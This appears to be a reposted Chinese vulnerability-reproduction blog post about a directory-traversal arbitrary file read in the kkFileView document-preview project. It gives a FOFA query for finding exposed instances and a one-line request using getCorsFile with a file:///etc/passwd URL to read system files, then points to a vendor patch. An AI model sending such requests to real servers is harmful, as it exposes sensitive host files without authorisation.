kkFileview存在任意文件读取漏洞

文章目录

  • kkFileview存在任意文件读取漏洞
    • 1. kkFileview简介
    • 2.漏洞描述
    • 3.影响版本
    • 4.fofa 查询语句
    • 5.漏洞复现
    • 6.POC&EXP
    • 7.整改意见
    • 8.往期回顾

kkFileview存在任意文件读取漏洞

1. kkFileview简介

微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发

kkFileView,一款成熟且开源的文件文档在线预览项目解决方案。kkFileView为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等

2.漏洞描述

Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。
Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。

3.影响版本

4.fofa 查询语句

body=“kkFileView”

5.漏洞复现

漏洞数据包如下,因为浏览器编码的原因,直接访问链接不会触发漏洞,需要以数据包的形式访问:

http://127.0.0.1/getCorsFile?urlPath=file:///etc/passwd

kkFileview存在任意文件读取漏洞_第1张图片

kkFileview存在任意文件读取漏洞_第2张图片

6.POC&EXP

关注公众号 南风漏洞复现文库 并回复 漏洞复现24 即可获得该 POC 工具下载地址:

本次的 poc 加入了代理功能,方便各位师傅调试。

kkFileview存在任意文件读取漏洞_第3张图片

7.整改意见

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://github.com/kekingcn/kkFileView/issues/304

8.往期回顾

你可能感兴趣的:(安全,web安全,网络)